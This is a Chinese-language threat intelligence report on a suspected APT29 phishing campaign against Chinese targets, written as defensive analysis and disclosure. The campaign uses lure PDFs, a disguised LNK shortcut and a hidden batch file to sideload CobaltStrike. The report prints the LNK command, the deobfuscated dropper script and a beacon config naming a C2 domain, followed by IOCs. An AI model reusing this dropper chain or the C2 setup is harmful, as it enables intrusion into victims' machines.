2023年8月：疑似APT29组织针对中国的活动分析

概述

  2023年7月，瑞星威胁情报中心捕获到多个带有中文诱饵文档的恶意压缩包。这些攻击事件除压缩包名称以及诱饵文档不同之外，其他相关的攻击战术，过程等基本一致。通过分析发现，其攻击链中的最后一步是在受害者机器上部署CobaltStrike。 CobaltStrike具有多种功能，包括远程控制、漏洞利用、命令和控制服务器等，可用于渗透测试和网络攻击。

  此次捕获的恶意压缩包中的诱饵文档都是由中文编写，第一个诱饵文档名为附件2：供货合同(商品年度采购).pdf，内容主要是混凝土材料采购供货合同。第二个诱饵文档名为北京市交通委年终总结报告-模版1.pdf，内容主要是关于工作总结的汇报。第三个诱饵文档名为孙继超-北京大学-硕士.pdf，内容是关于一名与金融领域相关的专业人士的简历。攻击者可能会利用钓鱼邮件等方式对目标投递这些恶意压缩文件，压缩文件内含有一个伪装成pdf的快捷方式和一个带隐藏属性的__MACOSX\.DOCX目录，当成功诱使受害者点击此恶意快捷方式后，快捷方式会执行__MACOSX\.DOCX目录下名为aaa.bat的批处理文件，利用aaa.bat打开__MACOSX\.DOCX目录下的诱饵文档迷惑用户以及使用侧加载技术运行同目录下的CobaltStrike。

ATT&CK 矩阵

攻击事件

  第一起攻击事件中，攻击者投递的诱饵文档名为附件2：供货合同(商品年度采购).pdf，内容主要是关于混凝土材料采购供货合同，工程名称是2022年度各等级商品，内容里面写着2023年度各等级商品混凝土供货周期暂定一年，其中买受人（甲方）为永丰失业商品有限公司，出卖人（乙方）是京东物流有限公司。

  第二起攻击事件中，攻击者投递的诱饵文档名为北京市交通委年终总结报告-模版1.pdf，诱饵文档的内容是关于工作总结的汇报，报告内所需要填写的内容包含工作指责概述,当前工作内容,当前工作总结以及下一步工作规划等。

  第三起攻击事件中，攻击者投递的诱饵文档名为孙继超-北京大学-硕士.pdf，内容是关于一名与金融领域相关的专业人士的简历，简历内提到此人毕业于中国名校北京大学，专业为金融学，熟悉各银行的组织结构及业务特点，了解现金设备和智能硬件。

攻击流程

样本分析

  攻击者根据目标投递包含恶意快捷方式附件2：供货合同(商品年度采购).pdf、北京市交通委年终总结报告-模版1.pdf.lnk或者孙继超-北京大学-硕士.pdf.lnk的同名压缩文件，该压缩包除了含有上述快捷方式以外，还带有一个含隐藏属性的名为__MACOSX\.DOCX的目录，此目录下含有与快捷方式同名的诱饵文档，以及名为aaa.bat，wda.tmp和mbp.tmp的文件。

1. 恶意快捷方式分析

  恶意快捷方式目的是利用系统下的cmd.exe程序执行隐藏目录__MACOSX\.DOCX中的 aaa.bat批处理文件。

%windir%\system32\cmd.exe /c "__MACOSX\.DOCX\aaa.bat"

2. aaa.bat文件分析

  攻击者使用了Batch Encryption工具对aaa.bat进行了混淆，可以通过开源工具Batch Encryption DeCoder解除混淆。当aaa.bat运行起来后会执行以下操作：

1. 将隐藏目录__MACOSX\.DOCX中的文件wda.tm和mbp.tmp复制到文件夹C:\ProgramData中。
2. 取消C:\ProgramData\wda.tmp和C:\ProgramData\mbp.tmp的系统、存档和隐藏属性。
3. 将文件夹C:\ProgramData中的wda.tmp重命名为OfficeUpdate.exe，将mbp.tmp重命名为appvisvsubsystems64.dll。
4. 取消__MACOSX\.DOCX目录中的wda.tmp以及aaa.bat的系统、存档和隐藏属性
5. 将__MACOSX\.DOCX目录中的快捷方式同名诱饵文档复制到当前LNK目录下。
6. 打开诱饵文档迷惑用户，执行C:\ProgramData\officeUpdate.exe加载恶意C:\ProgramData\appvisvsubsystems64.dll。
7. 删除__MACOSX\.DOCX目录中的wda.tmp，aaa.bat。
8. 删除LNK文件。

cmd /c xcopy /h /y %cd%\__MACOSX\.DOCX\wda.tmp C:\ProgramData\
xcopy /h /y %cd%\__MACOSX\.DOCX\mbp.tmp C:\ProgramData\
attrib -s -a -h C:\ProgramData\wda.tmp
rename C:\ProgramData\wda.tmp officeUpdate.exe
attrib -s -a -h C:\ProgramData\mbp.tmp
rename C:\ProgramData\mbp.tmp appvisvsubsystems64.dll
attrib -s -a -h %cd%\__MACOSX\.DOCX\wda.tmp
del "%cd%\__MACOSX\.DOCX\wda.tmp"
attrib -s -a -h %cd%\__MACOSX\.DOCX\aaa.bat
del *.pdf.lnk
copy %cd%\__MACOSX\.DOCX\孙继超-北京大学-硕士.pdf %cd%\孙继超-北京大学-硕士.pdf
start %cd%\孙继超-北京大学-硕士.pdf
start C:\ProgramData\officeUpdate.exe
del /s /q /f %0

3. appvisvsubsystems64.dll分析

  攻击者在C:\ProgramData中释放OfficeUpdate.exe和appvisvsubsystems64.dll。其中OfficeUpdate.exe来自Microsoft Office，是个合法程序，原程序名为WinWord.exe。恶意的appvisvsubsystems64.dll将通过侧加载技术被OfficeUpdate.exe执行起来。通过分析，appvisvsubsystems64.dll带UPX壳，由Go语言编写，并和CobaltStrike相关，其内CobaltStrike配置信息如下：

{
    "BeaconType": ["Hybrid HTTP DNS"],
    "Port": 1,
    "SleepTime": 3000,
    "MaxGetSize": 2097974,
    "Jitter": 31,
    "MaxDNS": 255,
    "C2Server": "info.gtjas.site,/functionalStatus/TqKwawSVfLIhmsolAo7M2TzcQ8",
    "DNS_Idle": "0.0.0.0",
    "DNS_Sleep": 0,
    "HttpGet_Verb": "GET",
    "HttpPost_Verb": "GET",
    "HttpPostChunk": 96,
    "Spawnto_x86": "%windir%\\syswow64\\mcbuilder.exe",
    "Spawnto_x64": "%windir%\\sysnative\\mcbuilder.exe",
    "CryptoScheme": 0,
    "Watermark": 100000,
    "bStageCleanup": "True",
    "bCFGCaution": "False",
}

  通过分析C2Server，发现info.gtjas.site曾解析的IP为123.60.89.125，其基本属性如下。该IP指向中国，服务提供商来自华为云。

Network 123.60.0.0/16
Autonomous System Number    55990
Autonomous System Label Huawei Cloud Service data center
Regional Internet Registry  APNIC
Country CN
Continent   AS

关联分析

  除了上述样本外，瑞星威胁情报中心于7月还发现另一起和这些类似的样本。该恶意样本名为礼品卡领取使用说明.pdf.rar，是个rar格式的压缩文件。其内含有用于迷惑用户的同名诱饵文档礼品卡领取使用说明.pdf，诱饵文档内容介绍了阳澄湖大闸蟹礼券礼卡提蟹卡，然后是对于公司员工所选择的提蟹卡类型地登记，登记项包含提取人姓名，礼品规格，公司部门等。

  恶意样本礼品卡领取使用说明.pdf.rar中含有一个伪装成PDF的快捷方式和一个带隐藏属性的__MACOSX\.DOCX目录，与上述样本不同的是，__MACOSX\.DOCX目录下除了同名PDF诱饵文档文件外，其有aaa.bat，wda.tmp，wda.tmp以及adcc.bin这四个文件。攻击者会将wda.tmp，wda.tmp和adcc.bin这3个文件藏于%temp%目录中，其中wda.tmp是合法程序，攻击者会将其伪装成360sd.exe。wda.tmp和adcc.bin则与CobaltStrike相关，其中wda.tmp被伪装成python27.dll。当成功诱使受害者点击此恶意快捷方式后，快捷方式会执行__MACOSX\.DOCX目录下名为aaa.bat的批处理文件，利用aaa.bat打开__MACOSX\.DOCX目录下的诱饵文档迷惑用户以及利用侧加载等技术运行同目录下的CobaltStrike。

  与上述7月份礼品卡领取使用说明.pdf.rar恶意样本类似的还有4月份的两起名为华润集团体操大赛回顾.rar和员工满意度调查表.zip的恶意样本。其都是利用快捷方式执行BAT文件，最终释放同名诱饵文档迷惑用户以及运行CobaltStrike。

预防措施

1. 不打开可疑文件。

   不打开未知来源的可疑的文件和邮件，防止社会工程学和钓鱼攻击。

2. 部署网络安全态势感知、预警系统等网关安全产品。

   网关安全产品可利用威胁情报追溯威胁行为轨迹，帮助用户进行威胁行为分析、定位威胁源和目的，追溯攻击的手段和路径，从源头解决网络威胁，最大范围内发现被攻击的节点，帮助企业更快响应和处理。

3. 安装有效的杀毒软件，拦截查杀恶意文档和木马病毒。

   杀毒软件可拦截恶意文档和木马病毒，如果用户不小心下载了恶意文件，杀毒软件可拦截查杀，阻止病毒运行，保护用户的终端安全。

   瑞星ESM目前已经可以检出此次攻击事件的相关样本。

4. 及时修补系统补丁和重要软件的补丁。

沦陷信标（IOC）

• MD5

  7F789DBA1406B5AFA6FB4F321DE600D6
  8567385620BD48989670483FA519FEB3
  4FA748FFCEE5382F55A3FC6CDA6F9C34
  9050EBC61B1EB3AD76D95F7A253AA519
  765FF930442C931B3C194FFF081E392E
  170C6C58FA5BD8CFD9F0AE6DAD10081D
  BF201BD35170ACEEA005ABB7C37874E0
  BD1EEC36517FC58C2A11A5A908811539
  2B329A0FB38B6280C41B47C8116D52D1
  9CC1AE38783FEE7906E6EFBDA0AF3DC7
  405AE78B997AEFAF49B7D2619FEBFF99
  9C6781EE7A11F6E7964C0CAA4A8460E7
  3052B739FD49A3ED479147AF62F9BB21
  D75D03DF69C09B697CFEC8B3673E6E34
  9BDBEFADAFDE26A0925CC3B56F3C90B6
  7A61340E8A8595832008CB6D6F6AC96F
  937366F2EAA26199DEF54FB434FF7059
  6BC9AAECF7523F15001D3A048B0211C8
  7BAB3C211B0E01373D4EBA7503C6162E
  171510E7F3217E2B2F899813D5B62BA1
  B646AD4B6AA216109889EB5F0DD06B2C
  065535D96270DE1A20183CD678E2CB5C
  E1E70423A87C9C73287942D0EE2AEB72
  1175502367BE9044F0DABB5A28CDB0EC
  66FB56B05B7187E4398275DF79A0060D

• Domain

  info.gtjas.site

参考链接

• https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/